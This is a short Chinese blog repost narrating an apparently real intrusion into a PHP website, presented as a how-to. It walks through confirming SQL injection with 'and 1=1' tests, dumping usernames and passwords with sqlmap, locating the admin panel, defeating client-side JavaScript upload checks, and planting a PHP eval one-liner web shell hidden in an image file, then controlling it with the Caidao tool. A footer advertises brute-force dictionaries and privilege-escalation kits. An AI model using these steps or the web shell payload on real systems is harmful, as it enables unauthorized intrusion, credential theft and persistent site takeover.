记录一次实战,注入+本地JS绕过拿shell
2022-7-28 09:1:48 Author: 潇湘信安(查看原文) 阅读量:17 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

文章来源:CSDN博客(Randmancy)

原文地址:

https://blog.csdn.net/qq_34341458/article/details/113845203

正文

1.找注入点

2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显

输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。
3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。
4.使用御剑扫描后台。然后进行登录。
我们先上传一个脚本木马试试。
发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。
我们找到表单form,删除相对应的脚本。
5.重新上传php一句话,发现
那么试下图片马
6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>

保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。


关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

 还在等什么?赶紧点击下方名片关注学习吧!


推 荐 阅 读



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247497182&idx=1&sn=88330a1ca0f21e36368ed34ab2b836bb&chksm=cfa551cdf8d2d8db61357b8eafefb2219d7d3273bdf0cda4c2b33675c2be8208d28a594b6e20#rd
如有侵权请联系:admin#unsafe.sh